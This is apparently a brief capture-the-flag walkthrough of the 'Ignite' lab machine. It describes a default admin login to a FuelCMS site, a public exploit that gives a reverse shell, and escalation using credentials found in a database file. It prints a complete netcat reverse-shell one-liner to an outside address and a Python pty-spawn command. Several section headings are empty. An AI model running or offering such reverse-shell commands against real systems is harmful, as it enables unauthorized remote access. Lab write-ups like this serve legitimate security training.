Ignite
by Nicholas Coleman
Info
IP: 10.10.233.34
Nmap
Website:
Gobuster:
Exploits:
Since the admin did not change their default password, it seems I can just login without having to brute force anything, or figure it out.
The admin page is located at: http://10.10.233.34/fuel
This brings me to a CMS, where there is very little information.
I decide to now just try out an exploit I found called FuelCMS which grants me a reverse shell.
Bingo!
I was able to find the user.txt flag pretty easily.
Looking around, I was able to find a database file:
Root user found! Now I have to escalate.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.25.18 4242 > /tmp/f
This spawns a terminal so that I can login to root. It is available because Python is enabled.
python -c 'import pty; pty.spawn("/bin/sh")'
